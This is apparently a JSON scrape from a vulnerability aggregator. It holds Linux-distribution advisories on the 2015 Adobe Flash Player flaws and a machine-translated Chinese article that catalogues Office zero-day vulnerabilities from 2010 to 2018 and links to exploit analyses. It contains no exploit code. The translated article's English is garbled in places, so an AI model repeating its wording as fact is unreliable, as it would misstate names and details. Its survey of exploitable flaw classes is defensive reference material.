"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0578", "CVE-2015-3097", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119"], "modified": "2015-07-08T00:00:00", "id": "C6DDB43D27A050C2835B948244DB9434", "href": "https://packages.altlinux.org/en/p6/srpms/adobe-flash-player/1874153338441013080", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2022-01-17T19:06:58", "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-plugins/adobe-flash-11.2.202.481\"", "cvss3": {}, "published": "2015-07-10T00:00:00", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0578", "CVE-2015-3113", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119"], "modified": "2015-07-10T00:00:00", "id": "GLSA-201507-13", "href": "https://security.gentoo.org/glsa/201507-13", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "Adobe Flash Player 11.2.202.481 contains fixes to critical security vulnerabilities found in earlier versions that could potentially allow an attacker to take control of the affected system. Adobe is aware of a report that an exploit targeting CVE-2015-5119 has been publicly published. This updates resolves heap buffer overflow vulnerabilities that could lead to code execution (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118). This updates resolves memory corruption vulnerabilities that could lead to code execution (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431). This updates resolves null pointer dereference issues (CVE-2015-3126, CVE-2015-4429). This updates resolves a security bypass vulnerability that could lead to information disclosure (CVE-2015-3114). This updates resolves type confusion vulnerabilities that could lead to code execution (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433). This updates resolves use-after-free vulnerabilities that could lead to code execution (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119). This updates resolves vulnerabilities that could be exploited to bypass the same-origin-policy and lead to information disclosure (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116). \n", "cvss3": {}, "published": "2015-07-09T08:09:20", "type": "mageia", "title": "Updated flash-player-plugin package fixes critical security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0578", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119"], "modified": "2015-07-09T08:09:20", "id": "MGASA-2015-0273", "href": "https://advisories.mageia.org/MGASA-2015-0273.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2021-10-19T20:36:55", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed in the Adobe Security Bulletin APSB15-16\nlisted in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain SWF\ncontent. An attacker could use these flaws to create a specially crafted\nSWF file that would cause flash-plugin to crash or, potentially, execute\narbitrary code when the victim loaded a page containing the malicious SWF\ncontent. (CVE-2015-3117, CVE-2015-3118, CVE-2015-3119, CVE-2015-3120,\nCVE-2015-3121, CVE-2015-3122, CVE-2015-3123, CVE-2015-3124, CVE-2015-3126,\nCVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3130, CVE-2015-3131,\nCVE-2015-3132, CVE-2015-3133, CVE-2015-3134, CVE-2015-3135, CVE-2015-3136,\nCVE-2015-3137, CVE-2015-4428, CVE-2015-4429, CVE-2015-4430, CVE-2015-4431,\nCVE-2015-4432, CVE-2015-4433, CVE-2015-5117, CVE-2015-5118, CVE-2015-5119)\n\nMultiple security bypass flaws were found in flash-plugin that could lead\nto the disclosure of sensitive information. (CVE-2014-0578, CVE-2015-3114,\nCVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.481.\n", "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "redhat", "title": "(RHSA-2015:1214) Critical: flash-plugin security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0578", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119", "CVE-2015-5124"], "modified": "2018-06-07T05:04:20", "id": "RHSA-2015:1214", "href": "https://access.redhat.com/errata/RHSA-2015:1214", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2019-06-13T15:28:22", "description": "This article is for me at Bluehat Shanghai 2019 presentation of an extended summary. In this article, I will summarize the 2010 to 2018 years of Office-related 0day/1day vulnerability. I will be for each type of vulnerability do once carded, and for each vulnerability related to the analysis of the articles referenced and categorized. \nHope this article can help to follow-up engaged in office vulnerability research. \n\nOverview \nFrom 2010 to 2018, the office of the 0day/1day attack has never been suspended before. Some of the following CVE number, is my in the course of the study specifically observed, there have been actual attacks sample 0day/1day vulnerability(perhaps there are some omissions, the reader can Supplement the). \nWe first look at the specific CVE number. \nYear \nNumber \n2010 \nCVE-2010-3333 \n2011 \nCVE-2011-0609/CVE-2011-0611 \n2012 \nCVE-2012-0158/CVE-2012-0779/CVE-2012-1535/CVE-2012-1856 \n2013 \nCVE-2013-0634/CVE-2013-3906 \n2014 \nCVE-2014-1761/CVE-2014-4114/CVE-2014-6352 \n2015 \nCVE-2015-0097/CVE-2015-1641/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645 \n2016 \nCVE-2016-4117/CVE-2016-7193/CVE-2016-7855 \n2017 \nCVE-2017-0199/CVE-2017-0261/CVE-2017-0262/CVE-2017-8570/CVE-2017-8759/CVE-2017-11826/CVE-2017-11882/CVE-2017-11292 \n2018 \nCVE-2018-0798/CVE-2018-0802/CVE-2018-4878/CVE-2018-5002/CVE-2018-8174/CVE-2018-8373/CVE-2018-15982 \nOur first press Assembly of the type above-described vulnerability classification. Note that, the Flash itself also belongs to the ActiveX control-a, the following table of classification I be independently classified as a class. \nComponent type \nNumber \nRTF control word parsing problem \nCVE-2010-3333/CVE-2014-1761/CVE-2016-7193 \nThe Open XML tag parsing problem \nCVE-2015-1641/CVE-2017-11826 \nActiveX control to resolve the problem \nCVE-2012-0158/CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nOffice embedded Flash vulnerabilities \nCVE-2011-0609/CVE-2011-0611/CVE-2012-0779/CVE-2012-1535/CVE-2013-0634/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645/CVE-2016-4117/CVE-2016-7855/CVE-2017-11292/CVE-2018-4878/CVE-2018-5002/CVE-2018-15982 \nOffice TIFF image parsing vulnerability \nCVE-2013-3906 \nOffice EPS file parsing vulnerability \nCVE-2015-2545/CVE-2017-0261/CVE-2017-0262 \nBy means of the Moniker the loading vulnerability \nCVE-2017-0199/CVE-2017-8570/CVE-2017-8759/CVE-2018-8174/CVE-2018-8373 \nOther Office logic vulnerability \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097 \nWe then based on the vulnerability type of the above-mentioned non-Flash vulnerabilities classification. Flash vulnerabilities related to the summary you can refer to other researcher's articles \nVulnerability type \nNumber \nStack Overflow(Stack Overflow) \nCVE-2010-3333/CVE-2012-0158/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nStack bounds write(Out-of-bound Write) \nCVE-2014-1761/CVE-2016-7193 \nType confusion(Type Confusion) \nCVE-2015-1641/CVE-2017-11826/CVE-2017-0262 \nAfter the release of reuse(Use After Free) \nCVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2017-0261/CVE-2018-8174/CVE-2018-8373 \nInteger overflow(Integer Overflow) \nCVE-2013-3906 \nLogic vulnerabilities(Logical vulnerability) \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097/CVE-2017-0199/CVE-2017-8570/CVE-2017-8759 \nNext We according to the above second table Flash vulnerability, except to one by one look at these vulnerabilities. \n\nRTF control word parsing problem \nCVE-2010-3333 \nThe vulnerability is the Cohen laboratory head of the wushi found. This is a stack overflow vulnerability. \nOn the vulnerability analysis of the article to see snow on a lot, the following are a few articles. \nCVE-2010-3333 vulnerability analysis(in depth analysis) \nMS10-087 from vulnerability to patch to the POC \nThe vulnerability of the war of Chapter 2, Section 4 of this vulnerability also have to compare the system description, the interested reader can read The Associated chapters. \nCVE-2014-1761 \nThe vulnerability is Google found a 0day in. This is a heap memory bounds write vulnerability. \nLi Hai fly was on the vulnerability done a very wonderful analysis. \nA Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers \nSee snow forum is also related to the vulnerability of the two high-quality analysis articles. \nCVE-2014-1761 analysis notes \nms14-017(cve-2014-1761)learn the notes inside there is mentioned how to configure the correct environment \nThe security agent is also related to the vulnerability of a high-quality analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08the third period\uff09 \nIn addition, South Korea's AhnLab also made a post about this vulnerability report. \nAnalysis of Zero-Day Exploit_Issue 01 Microsoft Word RTF Vulnerability CVE-2014-1761 \nDebugging this vulnerability requires attention is the vulnerability of some of the samples to trigger the environment is relatively harsh, the article inside mentions how to construct a relevant experimental environment. \nCVE-2016-7193 \nThe vulnerability is the Austrian Military Cyber Emergency Readiness Team Austria military Cyber Emergency Readiness Team reported to Microsoft a 0day is. \nIt is also a heap memory bounds write vulnerability. \nBaidu Security Labs has worked on the vulnerability done a more complete analysis. \nAPT attack weapon-the Word vulnerability, CVE-2016-7193 principles of the secret \nI also worked on the vulnerability of the use of writing to share through an article analysis. \nCombined with a field sample to construct a cve-2016-7193 bomb calculator use \n\nThe Open XML tag parsing problem \nCVE-2015-1641 \nGoogle 0day summary table will be listed for 2015 0day one. \nThis is a type confusion vulnerability. \nAbout the vulnerability, the fly tower has written an article analysis article. \nThe Curious Case Of The Document Exploiting An Unknown Vulnerability \u2013 Part 1 \nAli safe is also about the vulnerability wrote a wonderful analysis. \nword type confusion vulnerability CVE-2015-1641 analysis \nThe security agent also has the vulnerability of a wonderful analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08fourth period\uff09 \nKnow Chong Yu the 404 lab also wrote an article on the vulnerability the wonderful analysis. \nCVE-2015-1641 Word using the sample analysis \nI've also written relates to the vulnerability of the principles of an article to share. \nThe Open XML tag parsing class vulnerability analysis ideas \nIn debugging this relates to the heap spray in the office sample, the need to pay special attention to the debugger intervention tends to affect the process heap layout, particularly some of the heap option settings. If when debugging the sample behavior can not be a normal trigger, often directly with the debugger launch the sample result, this time you can try double-click the sample after Hang, the debug controller. \n\n\n**[1] [[2]](<94516_2.htm>) [[3]](<94516_3.htm>) [[4]](<94516_4.htm>) [next](<94516_2.htm>)**\n", "edition": 2, "cvss3": {}, "published": "2019-06-13T00:00:00", "title": "The macro perspective of the office vulnerability, 2010-2018-a vulnerability warning-the black bar safety net", "type": "myhack58", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2545", "CVE-2012-1856", "CVE-2012-1535", "CVE-2017-11292", "CVE-2018-8174", "CVE-2018-4878", "CVE-2011-0609", "CVE-2017-11882", "CVE-2018-0802", "CVE-2016-7855", "CVE-2017-8570", "CVE-2016-4117", "CVE-2012-0158", "CVE-2015-1642", "CVE-2010-3333", "CVE-2013-0634", "CVE-2015-5119", "CVE-2013-3906", "CVE-2014-4114", "CVE-2016-7193", "CVE-2018-15982", "CVE-2015-2424", "CVE-2018-8373", "CVE-2011-0611", "CVE-2015-5122", "CVE-2017-0199", "CVE-2015-0097", "CVE-2018-5002", "CVE-2018-0798", "CVE-2014-1761", "CVE-2014-6352", "CVE-2017-8759", "CVE-2015-1641", "CVE-2015-7645", "CVE-2017-11826", "CVE-2017-0262", "CVE-2012-0779", "CVE-2017-0261"], "modified": "2019-06-13T00:00:00", "id": "MYHACK58:62201994516", "href": "http://www.myhack58.com/Article/html/3/62/2019/94516.htm", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2021-06-08T18:56:57", "description": "Multiple memory corruptions, buffer overflows, information disclosure.", "edition": 2, "cvss3": {}, "published": "2015-07-19T00:00:00", "title": "Adobe Flash Player multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-5124", "CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-5123", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-5122", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-3097", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2015-07-19T00:00:00", "id": "SECURITYVULNS:VULN:14591", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14591", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}